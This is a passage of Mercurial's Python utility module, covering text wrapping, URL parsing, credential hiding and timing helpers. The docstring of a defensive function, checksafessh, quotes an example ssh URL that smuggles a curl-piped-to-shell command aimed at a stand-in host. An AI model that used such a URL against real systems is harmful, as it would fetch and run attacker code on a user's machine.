2732 2732 # Python 3 compatibility
2733 2733 return codecs.escape_encode(s)[0]
2734 2734
2735 2735 def unescapestr(s):
2736 2736 return codecs.escape_decode(s)[0]
2737 2737
2738 2738 def forcebytestr(obj):
2739 2739 """Portably format an arbitrary object (e.g. exception) into a byte
2740 2740 string."""
2741 2741 try:
2742 2742 return pycompat.bytestr(obj)
2743 2743 except UnicodeEncodeError:
2744 2744 # non-ascii string, may be lossy
2745 2745 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2746 2746
2747 2747 def uirepr(s):
2748 2748 # Avoid double backslash in Windows path repr()
2749 2749 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2750 2750
2751 2751 # delay import of textwrap
2752 2752 def MBTextWrapper(**kwargs):
2753 2753 class tw(textwrap.TextWrapper):
2754 2754 """
2755 2755 Extend TextWrapper for width-awareness.
2756 2756
2757 2757 Neither number of 'bytes' in any encoding nor 'characters' is
2758 2758 appropriate to calculate terminal columns for specified string.
2759 2759
2760 2760 Original TextWrapper implementation uses built-in 'len()' directly,
2761 2761 so overriding is needed to use width information of each characters.
2762 2762
2763 2763 In addition, characters classified into 'ambiguous' width are
2764 2764 treated as wide in East Asian area, but as narrow in other.
2765 2765
2766 2766 This requires use decision to determine width of such characters.
2767 2767 """
2768 2768 def _cutdown(self, ucstr, space_left):
2769 2769 l = 0
2770 2770 colwidth = encoding.ucolwidth
2771 2771 for i in xrange(len(ucstr)):
2772 2772 l += colwidth(ucstr[i])
2773 2773 if space_left < l:
2774 2774 return (ucstr[:i], ucstr[i:])
2775 2775 return ucstr, ''
2776 2776
2777 2777 # overriding of base class
2778 2778 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2779 2779 space_left = max(width - cur_len, 1)
2780 2780
2781 2781 if self.break_long_words:
2782 2782 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2783 2783 cur_line.append(cut)
2784 2784 reversed_chunks[-1] = res
2785 2785 elif not cur_line:
2786 2786 cur_line.append(reversed_chunks.pop())
2787 2787
2788 2788 # this overriding code is imported from TextWrapper of Python 2.6
2789 2789 # to calculate columns of string by 'encoding.ucolwidth()'
2790 2790 def _wrap_chunks(self, chunks):
2791 2791 colwidth = encoding.ucolwidth
2792 2792
2793 2793 lines = []
2794 2794 if self.width <= 0:
2795 2795 raise ValueError("invalid width %r (must be > 0)" % self.width)
2796 2796
2797 2797 # Arrange in reverse order so items can be efficiently popped
2798 2798 # from a stack of chucks.
2799 2799 chunks.reverse()
2800 2800
2801 2801 while chunks:
2802 2802
2803 2803 # Start the list of chunks that will make up the current line.
2804 2804 # cur_len is just the length of all the chunks in cur_line.
2805 2805 cur_line = []
2806 2806 cur_len = 0
2807 2807
2808 2808 # Figure out which static string will prefix this line.
2809 2809 if lines:
2810 2810 indent = self.subsequent_indent
2811 2811 else:
2812 2812 indent = self.initial_indent
2813 2813
2814 2814 # Maximum width for this line.
2815 2815 width = self.width - len(indent)
2816 2816
2817 2817 # First chunk on line is whitespace -- drop it, unless this
2818 2818 # is the very beginning of the text (i.e. no lines started yet).
2819 2819 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2820 2820 del chunks[-1]
2821 2821
2822 2822 while chunks:
2823 2823 l = colwidth(chunks[-1])
2824 2824
2825 2825 # Can at least squeeze this chunk onto the current line.
2826 2826 if cur_len + l <= width:
2827 2827 cur_line.append(chunks.pop())
2828 2828 cur_len += l
2829 2829
2830 2830 # Nope, this line is full.
2831 2831 else:
2832 2832 break
2833 2833
2834 2834 # The current line is full, and the next chunk is too big to
2835 2835 # fit on *any* line (not just this one).
2836 2836 if chunks and colwidth(chunks[-1]) > width:
2837 2837 self._handle_long_word(chunks, cur_line, cur_len, width)
2838 2838
2839 2839 # If the last chunk on this line is all whitespace, drop it.
2840 2840 if (self.drop_whitespace and
2841 2841 cur_line and cur_line[-1].strip() == r''):
2842 2842 del cur_line[-1]
2843 2843
2844 2844 # Convert current line back to a string and store it in list
2845 2845 # of all lines (return value).
2846 2846 if cur_line:
2847 2847 lines.append(indent + r''.join(cur_line))
2848 2848
2849 2849 return lines
2850 2850
2851 2851 global MBTextWrapper
2852 2852 MBTextWrapper = tw
2853 2853 return tw(**kwargs)
2854 2854
2855 2855 def wrap(line, width, initindent='', hangindent=''):
2856 2856 maxindent = max(len(hangindent), len(initindent))
2857 2857 if width <= maxindent:
2858 2858 # adjust for weird terminal size
2859 2859 width = max(78, maxindent + 1)
2860 2860 line = line.decode(pycompat.sysstr(encoding.encoding),
2861 2861 pycompat.sysstr(encoding.encodingmode))
2862 2862 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2863 2863 pycompat.sysstr(encoding.encodingmode))
2864 2864 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2865 2865 pycompat.sysstr(encoding.encodingmode))
2866 2866 wrapper = MBTextWrapper(width=width,
2867 2867 initial_indent=initindent,
2868 2868 subsequent_indent=hangindent)
2869 2869 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2870 2870
2871 2871 if (pyplatform.python_implementation() == 'CPython' and
2872 2872 sys.version_info < (3, 0)):
2873 2873 # There is an issue in CPython that some IO methods do not handle EINTR
2874 2874 # correctly. The following table shows what CPython version (and functions)
2875 2875 # are affected (buggy: has the EINTR bug, okay: otherwise):
2876 2876 #
2877 2877 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2878 2878 # --------------------------------------------------
2879 2879 # fp.__iter__ | buggy | buggy | okay
2880 2880 # fp.read* | buggy | okay [1] | okay
2881 2881 #
2882 2882 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2883 2883 #
2884 2884 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2885 2885 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2886 2886 #
2887 2887 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2888 2888 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2889 2889 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2890 2890 # fp.__iter__ but not other fp.read* methods.
2891 2891 #
2892 2892 # On modern systems like Linux, the "read" syscall cannot be interrupted
2893 2893 # when reading "fast" files like on-disk files. So the EINTR issue only
2894 2894 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2895 2895 # files approximately as "fast" files and use the fast (unsafe) code path,
2896 2896 # to minimize the performance impact.
2897 2897 if sys.version_info >= (2, 7, 4):
2898 2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 2899 def _safeiterfile(fp):
2900 2900 return iter(fp.readline, '')
2901 2901 else:
2902 2902 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2903 2903 # note: this may block longer than necessary because of bufsize.
2904 2904 def _safeiterfile(fp, bufsize=4096):
2905 2905 fd = fp.fileno()
2906 2906 line = ''
2907 2907 while True:
2908 2908 try:
2909 2909 buf = os.read(fd, bufsize)
2910 2910 except OSError as ex:
2911 2911 # os.read only raises EINTR before any data is read
2912 2912 if ex.errno == errno.EINTR:
2913 2913 continue
2914 2914 else:
2915 2915 raise
2916 2916 line += buf
2917 2917 if '\n' in buf:
2918 2918 splitted = line.splitlines(True)
2919 2919 line = ''
2920 2920 for l in splitted:
2921 2921 if l[-1] == '\n':
2922 2922 yield l
2923 2923 else:
2924 2924 line = l
2925 2925 if not buf:
2926 2926 break
2927 2927 if line:
2928 2928 yield line
2929 2929
2930 2930 def iterfile(fp):
2931 2931 fastpath = True
2932 2932 if type(fp) is file:
2933 2933 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2934 2934 if fastpath:
2935 2935 return fp
2936 2936 else:
2937 2937 return _safeiterfile(fp)
2938 2938 else:
2939 2939 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2940 2940 def iterfile(fp):
2941 2941 return fp
2942 2942
2943 2943 def iterlines(iterator):
2944 2944 for chunk in iterator:
2945 2945 for line in chunk.splitlines():
2946 2946 yield line
2947 2947
2948 2948 def expandpath(path):
2949 2949 return os.path.expanduser(os.path.expandvars(path))
2950 2950
2951 2951 def hgcmd():
2952 2952 """Return the command used to execute current hg
2953 2953
2954 2954 This is different from hgexecutable() because on Windows we want
2955 2955 to avoid things opening new shell windows like batch files, so we
2956 2956 get either the python call or current executable.
2957 2957 """
2958 2958 if mainfrozen():
2959 2959 if getattr(sys, 'frozen', None) == 'macosx_app':
2960 2960 # Env variable set by py2app
2961 2961 return [encoding.environ['EXECUTABLEPATH']]
2962 2962 else:
2963 2963 return [pycompat.sysexecutable]
2964 2964 return gethgcmd()
2965 2965
2966 2966 def rundetached(args, condfn):
2967 2967 """Execute the argument list in a detached process.
2968 2968
2969 2969 condfn is a callable which is called repeatedly and should return
2970 2970 True once the child process is known to have started successfully.
2971 2971 At this point, the child process PID is returned. If the child
2972 2972 process fails to start or finishes before condfn() evaluates to
2973 2973 True, return -1.
2974 2974 """
2975 2975 # Windows case is easier because the child process is either
2976 2976 # successfully starting and validating the condition or exiting
2977 2977 # on failure. We just poll on its PID. On Unix, if the child
2978 2978 # process fails to start, it will be left in a zombie state until
2979 2979 # the parent wait on it, which we cannot do since we expect a long
2980 2980 # running process on success. Instead we listen for SIGCHLD telling
2981 2981 # us our child process terminated.
2982 2982 terminated = set()
2983 2983 def handler(signum, frame):
2984 2984 terminated.add(os.wait())
2985 2985 prevhandler = None
2986 2986 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2987 2987 if SIGCHLD is not None:
2988 2988 prevhandler = signal.signal(SIGCHLD, handler)
2989 2989 try:
2990 2990 pid = spawndetached(args)
2991 2991 while not condfn():
2992 2992 if ((pid in terminated or not testpid(pid))
2993 2993 and not condfn()):
2994 2994 return -1
2995 2995 time.sleep(0.1)
2996 2996 return pid
2997 2997 finally:
2998 2998 if prevhandler is not None:
2999 2999 signal.signal(signal.SIGCHLD, prevhandler)
3000 3000
3001 3001 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3002 3002 """Return the result of interpolating items in the mapping into string s.
3003 3003
3004 3004 prefix is a single character string, or a two character string with
3005 3005 a backslash as the first character if the prefix needs to be escaped in
3006 3006 a regular expression.
3007 3007
3008 3008 fn is an optional function that will be applied to the replacement text
3009 3009 just before replacement.
3010 3010
3011 3011 escape_prefix is an optional flag that allows using doubled prefix for
3012 3012 its escaping.
3013 3013 """
3014 3014 fn = fn or (lambda s: s)
3015 3015 patterns = '|'.join(mapping.keys())
3016 3016 if escape_prefix:
3017 3017 patterns += '|' + prefix
3018 3018 if len(prefix) > 1:
3019 3019 prefix_char = prefix[1:]
3020 3020 else:
3021 3021 prefix_char = prefix
3022 3022 mapping[prefix_char] = prefix_char
3023 3023 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3024 3024 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3025 3025
3026 3026 def getport(port):
3027 3027 """Return the port for a given network service.
3028 3028
3029 3029 If port is an integer, it's returned as is. If it's a string, it's
3030 3030 looked up using socket.getservbyname(). If there's no matching
3031 3031 service, error.Abort is raised.
3032 3032 """
3033 3033 try:
3034 3034 return int(port)
3035 3035 except ValueError:
3036 3036 pass
3037 3037
3038 3038 try:
3039 3039 return socket.getservbyname(pycompat.sysstr(port))
3040 3040 except socket.error:
3041 3041 raise Abort(_("no port number associated with service '%s'") % port)
3042 3042
3043 3043 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3044 3044 '0': False, 'no': False, 'false': False, 'off': False,
3045 3045 'never': False}
3046 3046
3047 3047 def parsebool(s):
3048 3048 """Parse s into a boolean.
3049 3049
3050 3050 If s is not a valid boolean, returns None.
3051 3051 """
3052 3052 return _booleans.get(s.lower(), None)
3053 3053
3054 3054 _hextochr = dict((a + b, chr(int(a + b, 16)))
3055 3055 for a in string.hexdigits for b in string.hexdigits)
3056 3056
3057 3057 class url(object):
3058 3058 r"""Reliable URL parser.
3059 3059
3060 3060 This parses URLs and provides attributes for the following
3061 3061 components:
3062 3062
3063 3063 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3064 3064
3065 3065 Missing components are set to None. The only exception is
3066 3066 fragment, which is set to '' if present but empty.
3067 3067
3068 3068 If parsefragment is False, fragment is included in query. If
3069 3069 parsequery is False, query is included in path. If both are
3070 3070 False, both fragment and query are included in path.
3071 3071
3072 3072 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3073 3073
3074 3074 Note that for backward compatibility reasons, bundle URLs do not
3075 3075 take host names. That means 'bundle://../' has a path of '../'.
3076 3076
3077 3077 Examples:
3078 3078
3079 3079 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3080 3080 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3081 3081 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3082 3082 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3083 3083 >>> url(b'file:///home/joe/repo')
3084 3084 <url scheme: 'file', path: '/home/joe/repo'>
3085 3085 >>> url(b'file:///c:/temp/foo/')
3086 3086 <url scheme: 'file', path: 'c:/temp/foo/'>
3087 3087 >>> url(b'bundle:foo')
3088 3088 <url scheme: 'bundle', path: 'foo'>
3089 3089 >>> url(b'bundle://../foo')
3090 3090 <url scheme: 'bundle', path: '../foo'>
3091 3091 >>> url(br'c:\foo\bar')
3092 3092 <url path: 'c:\\foo\\bar'>
3093 3093 >>> url(br'\\blah\blah\blah')
3094 3094 <url path: '\\\\blah\\blah\\blah'>
3095 3095 >>> url(br'\\blah\blah\blah#baz')
3096 3096 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3097 3097 >>> url(br'file:///C:\users\me')
3098 3098 <url scheme: 'file', path: 'C:\\users\\me'>
3099 3099
3100 3100 Authentication credentials:
3101 3101
3102 3102 >>> url(b'ssh://joe:xyz@x/repo')
3103 3103 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3104 3104 >>> url(b'ssh://joe@x/repo')
3105 3105 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3106 3106
3107 3107 Query strings and fragments:
3108 3108
3109 3109 >>> url(b'http://host/a?b#c')
3110 3110 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3111 3111 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3112 3112 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3113 3113
3114 3114 Empty path:
3115 3115
3116 3116 >>> url(b'')
3117 3117 <url path: ''>
3118 3118 >>> url(b'#a')
3119 3119 <url path: '', fragment: 'a'>
3120 3120 >>> url(b'http://host/')
3121 3121 <url scheme: 'http', host: 'host', path: ''>
3122 3122 >>> url(b'http://host/#a')
3123 3123 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3124 3124
3125 3125 Only scheme:
3126 3126
3127 3127 >>> url(b'http:')
3128 3128 <url scheme: 'http'>
3129 3129 """
3130 3130
3131 3131 _safechars = "!~*'()+"
3132 3132 _safepchars = "/!~*'()+:\\"
3133 3133 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3134 3134
3135 3135 def __init__(self, path, parsequery=True, parsefragment=True):
3136 3136 # We slowly chomp away at path until we have only the path left
3137 3137 self.scheme = self.user = self.passwd = self.host = None
3138 3138 self.port = self.path = self.query = self.fragment = None
3139 3139 self._localpath = True
3140 3140 self._hostport = ''
3141 3141 self._origpath = path
3142 3142
3143 3143 if parsefragment and '#' in path:
3144 3144 path, self.fragment = path.split('#', 1)
3145 3145
3146 3146 # special case for Windows drive letters and UNC paths
3147 3147 if hasdriveletter(path) or path.startswith('\\\\'):
3148 3148 self.path = path
3149 3149 return
3150 3150
3151 3151 # For compatibility reasons, we can't handle bundle paths as
3152 3152 # normal URLS
3153 3153 if path.startswith('bundle:'):
3154 3154 self.scheme = 'bundle'
3155 3155 path = path[7:]
3156 3156 if path.startswith('//'):
3157 3157 path = path[2:]
3158 3158 self.path = path
3159 3159 return
3160 3160
3161 3161 if self._matchscheme(path):
3162 3162 parts = path.split(':', 1)
3163 3163 if parts[0]:
3164 3164 self.scheme, path = parts
3165 3165 self._localpath = False
3166 3166
3167 3167 if not path:
3168 3168 path = None
3169 3169 if self._localpath:
3170 3170 self.path = ''
3171 3171 return
3172 3172 else:
3173 3173 if self._localpath:
3174 3174 self.path = path
3175 3175 return
3176 3176
3177 3177 if parsequery and '?' in path:
3178 3178 path, self.query = path.split('?', 1)
3179 3179 if not path:
3180 3180 path = None
3181 3181 if not self.query:
3182 3182 self.query = None
3183 3183
3184 3184 # // is required to specify a host/authority
3185 3185 if path and path.startswith('//'):
3186 3186 parts = path[2:].split('/', 1)
3187 3187 if len(parts) > 1:
3188 3188 self.host, path = parts
3189 3189 else:
3190 3190 self.host = parts[0]
3191 3191 path = None
3192 3192 if not self.host:
3193 3193 self.host = None
3194 3194 # path of file:///d is /d
3195 3195 # path of file:///d:/ is d:/, not /d:/
3196 3196 if path and not hasdriveletter(path):
3197 3197 path = '/' + path
3198 3198
3199 3199 if self.host and '@' in self.host:
3200 3200 self.user, self.host = self.host.rsplit('@', 1)
3201 3201 if ':' in self.user:
3202 3202 self.user, self.passwd = self.user.split(':', 1)
3203 3203 if not self.host:
3204 3204 self.host = None
3205 3205
3206 3206 # Don't split on colons in IPv6 addresses without ports
3207 3207 if (self.host and ':' in self.host and
3208 3208 not (self.host.startswith('[') and self.host.endswith(']'))):
3209 3209 self._hostport = self.host
3210 3210 self.host, self.port = self.host.rsplit(':', 1)
3211 3211 if not self.host:
3212 3212 self.host = None
3213 3213
3214 3214 if (self.host and self.scheme == 'file' and
3215 3215 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3216 3216 raise Abort(_('file:// URLs can only refer to localhost'))
3217 3217
3218 3218 self.path = path
3219 3219
3220 3220 # leave the query string escaped
3221 3221 for a in ('user', 'passwd', 'host', 'port',
3222 3222 'path', 'fragment'):
3223 3223 v = getattr(self, a)
3224 3224 if v is not None:
3225 3225 setattr(self, a, urlreq.unquote(v))
3226 3226
3227 3227 @encoding.strmethod
3228 3228 def __repr__(self):
3229 3229 attrs = []
3230 3230 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3231 3231 'query', 'fragment'):
3232 3232 v = getattr(self, a)
3233 3233 if v is not None:
3234 3234 attrs.append('%s: %r' % (a, v))
3235 3235 return '<url %s>' % ', '.join(attrs)
3236 3236
3237 3237 def __bytes__(self):
3238 3238 r"""Join the URL's components back into a URL string.
3239 3239
3240 3240 Examples:
3241 3241
3242 3242 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3243 3243 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3244 3244 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3245 3245 'http://user:pw@host:80/?foo=bar&baz=42'
3246 3246 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3247 3247 'http://user:pw@host:80/?foo=bar%3dbaz'
3248 3248 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3249 3249 'ssh://user:pw@[::1]:2200//home/joe#'
3250 3250 >>> bytes(url(b'http://localhost:80//'))
3251 3251 'http://localhost:80//'
3252 3252 >>> bytes(url(b'http://localhost:80/'))
3253 3253 'http://localhost:80/'
3254 3254 >>> bytes(url(b'http://localhost:80'))
3255 3255 'http://localhost:80/'
3256 3256 >>> bytes(url(b'bundle:foo'))
3257 3257 'bundle:foo'
3258 3258 >>> bytes(url(b'bundle://../foo'))
3259 3259 'bundle:../foo'
3260 3260 >>> bytes(url(b'path'))
3261 3261 'path'
3262 3262 >>> bytes(url(b'file:///tmp/foo/bar'))
3263 3263 'file:///tmp/foo/bar'
3264 3264 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3265 3265 'file:///c:/tmp/foo/bar'
3266 3266 >>> print(url(br'bundle:foo\bar'))
3267 3267 bundle:foo\bar
3268 3268 >>> print(url(br'file:///D:\data\hg'))
3269 3269 file:///D:\data\hg
3270 3270 """
3271 3271 if self._localpath:
3272 3272 s = self.path
3273 3273 if self.scheme == 'bundle':
3274 3274 s = 'bundle:' + s
3275 3275 if self.fragment:
3276 3276 s += '#' + self.fragment
3277 3277 return s
3278 3278
3279 3279 s = self.scheme + ':'
3280 3280 if self.user or self.passwd or self.host:
3281 3281 s += '//'
3282 3282 elif self.scheme and (not self.path or self.path.startswith('/')
3283 3283 or hasdriveletter(self.path)):
3284 3284 s += '//'
3285 3285 if hasdriveletter(self.path):
3286 3286 s += '/'
3287 3287 if self.user:
3288 3288 s += urlreq.quote(self.user, safe=self._safechars)
3289 3289 if self.passwd:
3290 3290 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3291 3291 if self.user or self.passwd:
3292 3292 s += '@'
3293 3293 if self.host:
3294 3294 if not (self.host.startswith('[') and self.host.endswith(']')):
3295 3295 s += urlreq.quote(self.host)
3296 3296 else:
3297 3297 s += self.host
3298 3298 if self.port:
3299 3299 s += ':' + urlreq.quote(self.port)
3300 3300 if self.host:
3301 3301 s += '/'
3302 3302 if self.path:
3303 3303 # TODO: similar to the query string, we should not unescape the
3304 3304 # path when we store it, the path might contain '%2f' = '/',
3305 3305 # which we should *not* escape.
3306 3306 s += urlreq.quote(self.path, safe=self._safepchars)
3307 3307 if self.query:
3308 3308 # we store the query in escaped form.
3309 3309 s += '?' + self.query
3310 3310 if self.fragment is not None:
3311 3311 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3312 3312 return s
3313 3313
3314 3314 __str__ = encoding.strmethod(__bytes__)
3315 3315
3316 3316 def authinfo(self):
3317 3317 user, passwd = self.user, self.passwd
3318 3318 try:
3319 3319 self.user, self.passwd = None, None
3320 3320 s = bytes(self)
3321 3321 finally:
3322 3322 self.user, self.passwd = user, passwd
3323 3323 if not self.user:
3324 3324 return (s, None)
3325 3325 # authinfo[1] is passed to urllib2 password manager, and its
3326 3326 # URIs must not contain credentials. The host is passed in the
3327 3327 # URIs list because Python < 2.4.3 uses only that to search for
3328 3328 # a password.
3329 3329 return (s, (None, (s, self.host),
3330 3330 self.user, self.passwd or ''))
3331 3331
3332 3332 def isabs(self):
3333 3333 if self.scheme and self.scheme != 'file':
3334 3334 return True # remote URL
3335 3335 if hasdriveletter(self.path):
3336 3336 return True # absolute for our purposes - can't be joined()
3337 3337 if self.path.startswith(br'\\'):
3338 3338 return True # Windows UNC path
3339 3339 if self.path.startswith('/'):
3340 3340 return True # POSIX-style
3341 3341 return False
3342 3342
3343 3343 def localpath(self):
3344 3344 if self.scheme == 'file' or self.scheme == 'bundle':
3345 3345 path = self.path or '/'
3346 3346 # For Windows, we need to promote hosts containing drive
3347 3347 # letters to paths with drive letters.
3348 3348 if hasdriveletter(self._hostport):
3349 3349 path = self._hostport + '/' + self.path
3350 3350 elif (self.host is not None and self.path
3351 3351 and not hasdriveletter(path)):
3352 3352 path = '/' + path
3353 3353 return path
3354 3354 return self._origpath
3355 3355
3356 3356 def islocal(self):
3357 3357 '''whether localpath will return something that posixfile can open'''
3358 3358 return (not self.scheme or self.scheme == 'file'
3359 3359 or self.scheme == 'bundle')
3360 3360
3361 3361 def hasscheme(path):
3362 3362 return bool(url(path).scheme)
3363 3363
3364 3364 def hasdriveletter(path):
3365 3365 return path and path[1:2] == ':' and path[0:1].isalpha()
3366 3366
3367 3367 def urllocalpath(path):
3368 3368 return url(path, parsequery=False, parsefragment=False).localpath()
3369 3369
3370 3370 def checksafessh(path):
3371 3371 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3372 3372
3373 3373 This is a sanity check for ssh urls. ssh will parse the first item as
3374 3374 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3375 3375 Let's prevent these potentially exploited urls entirely and warn the
3376 3376 user.
3377 3377
3378 3378 Raises an error.Abort when the url is unsafe.
3379 3379 """
3380 3380 path = urlreq.unquote(path)
3381 3381 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3382 3382 raise error.Abort(_('potentially unsafe url: %r') %
3383 3383 (path,))
3384 3384
3385 3385 def hidepassword(u):
3386 3386 '''hide user credential in a url string'''
3387 3387 u = url(u)
3388 3388 if u.passwd:
3389 3389 u.passwd = '***'
3390 3390 return bytes(u)
3391 3391
3392 3392 def removeauth(u):
3393 3393 '''remove all authentication information from a url string'''
3394 3394 u = url(u)
3395 3395 u.user = u.passwd = None
3396 3396 return str(u)
3397 3397
3398 3398 timecount = unitcountfn(
3399 3399 (1, 1e3, _('%.0f s')),
3400 3400 (100, 1, _('%.1f s')),
3401 3401 (10, 1, _('%.2f s')),
3402 3402 (1, 1, _('%.3f s')),
3403 3403 (100, 0.001, _('%.1f ms')),
3404 3404 (10, 0.001, _('%.2f ms')),
3405 3405 (1, 0.001, _('%.3f ms')),
3406 3406 (100, 0.000001, _('%.1f us')),
3407 3407 (10, 0.000001, _('%.2f us')),
3408 3408 (1, 0.000001, _('%.3f us')),
3409 3409 (100, 0.000000001, _('%.1f ns')),
3410 3410 (10, 0.000000001, _('%.2f ns')),
3411 3411 (1, 0.000000001, _('%.3f ns')),
3412 3412 )
3413 3413
3414 3414 _timenesting = [0]
3415 3415
3416 3416 def timed(func):
3417 3417 '''Report the execution time of a function call to stderr.
3418 3418
3419 3419 During development, use as a decorator when you need to measure
3420 3420 the cost of a function, e.g. as follows:
3421 3421
3422 3422 @util.timed
3423 3423 def foo(a, b, c):
3424 3424 pass
3425 3425 '''
3426 3426
3427 3427 def wrapper(*args, **kwargs):
3428 3428 start = timer()
3429 3429 indent = 2
3430 3430 _timenesting[0] += indent
3431 3431 try:
3432 3432 return func(*args, **kwargs)
3433 3433 finally:
3434 3434 elapsed = timer() - start
3435 3435 _timenesting[0] -= indent
3436 3436 stderr.write('%s%s: %s\n' %
3437 3437 (' ' * _timenesting[0], func.__name__,
3438 3438 timecount(elapsed)))
3439 3439 return wrapper
3440 3440
3441 3441 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3442 3442 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3443 3443
3444 3444 def sizetoint(s):
3445 3445 '''Convert a space specifier to a byte count.
3446 3446
3447 3447 >>> sizetoint(b'30')
3448 3448 30
3449 3449 >>> sizetoint(b'2.2kb')
3450 3450 2252
3451 3451 >>> sizetoint(b'6M')
3452 3452 6291456
3453 3453 '''
3454 3454 t = s.strip().lower()
3455 3455 try:
3456 3456 for k, u in _sizeunits:
3457 3457 if t.endswith(k):
3458 3458 return int(float(t[:-len(k)]) * u)
3459 3459 return int(t)
3460 3460 except ValueError:
3461 3461 raise error.ParseError(_("couldn't parse size: %s") % s)
3462 3462
3463 3463 class hooks(object):
3464 3464 '''A collection of hook functions that can be used to extend a
3465 3465 function's behavior. Hooks are called in lexicographic order,
3466 3466 based on the names of their sources.'''
3467 3467
3468 3468 def __init__(self):
3469 3469 self._hooks = []
3470 3470
3471 3471 def add(self, source, hook):
3472 3472 self._hooks.append((source, hook))
3473 3473
3474 3474 def __call__(self, *args):
3475 3475 self._hooks.sort(key=lambda x: x[0])
3476 3476 results = []
3477 3477 for source, hook in self._hooks:
3478 3478 results.append(hook(*args))
3479 3479 return results
3480 3480
3481 3481 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3482 3482 '''Yields lines for a nicely formatted stacktrace.
3483 3483 Skips the 'skip' last entries, then return the last 'depth' entries.
3484 3484 Each file+linenumber is formatted according to fileline.
3485 3485 Each line is formatted according to line.
3486 3486 If line is None, it yields:
3487 3487 length of longest filepath+line number,
3488 3488 filepath+linenumber,
3489 3489 function
3490 3490
3491 3491 Not be used in production code but very convenient while developing.
3492 3492 '''
3493 3493 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3494 3494 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3495 3495 ][-depth:]
3496 3496 if entries:
3497 3497 fnmax = max(len(entry[0]) for entry in entries)
3498 3498 for fnln, func in entries:
3499 3499 if line is None:
3500 3500 yield (fnmax, fnln, func)
3501 3501 else:
3502 3502 yield line % (fnmax, fnln, func)
3503 3503
3504 3504 def debugstacktrace(msg='stacktrace', skip=0,
3505 3505 f=stderr, otherf=stdout, depth=0):
3506 3506 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3507 3507 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3508 3508 By default it will flush stdout first.
3509 3509 It can be used everywhere and intentionally does not require an ui object.
3510 3510 Not be used in production code but very convenient while developing.
3511 3511 '''
3512 3512 if otherf:
3513 3513 otherf.flush()
3514 3514 f.write('%s at:\n' % msg.rstrip())
3515 3515 for line in getstackframes(skip + 1, depth=depth):
3516 3516 f.write(line)
3517 3517 f.flush()
3518 3518
3519 3519 class dirs(object):
3520 3520 '''a multiset of directory names from a dirstate or manifest'''
3521 3521
3522 3522 def __init__(self, map, skip=None):
3523 3523 self._dirs = {}
3524 3524 addpath = self.addpath
3525 3525 if safehasattr(map, 'iteritems') and skip is not None:
3526 3526 for f, s in map.iteritems():
3527 3527 if s[0] != skip:
3528 3528 addpath(f)
3529 3529 else:
3530 3530 for f in map:
3531 3531 addpath(f)
3532 3532
3533 3533 def addpath(self, path):
3534 3534 dirs = self._dirs
3535 3535 for base in finddirs(path):
3536 3536 if base in dirs:
3537 3537 dirs[base] += 1
3538 3538 return
3539 3539 dirs[base] = 1
3540 3540
3541 3541 def delpath(self, path):
3542 3542 dirs = self._dirs
3543 3543 for base in finddirs(path):
3544 3544 if dirs[base] > 1:
3545 3545 dirs[base] -= 1
3546 3546 return
